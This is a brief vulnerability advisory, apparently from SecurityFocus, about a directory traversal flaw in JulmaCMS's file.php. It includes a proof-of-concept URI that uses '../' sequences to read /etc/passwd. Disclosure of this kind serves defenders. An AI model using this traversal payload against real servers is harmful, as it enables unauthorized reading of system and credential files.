info
discussion
exploit
solution
references
JulmaCMS File.PHP Directory Traversal Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://example.com/file.php?file=../../../../../../etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus
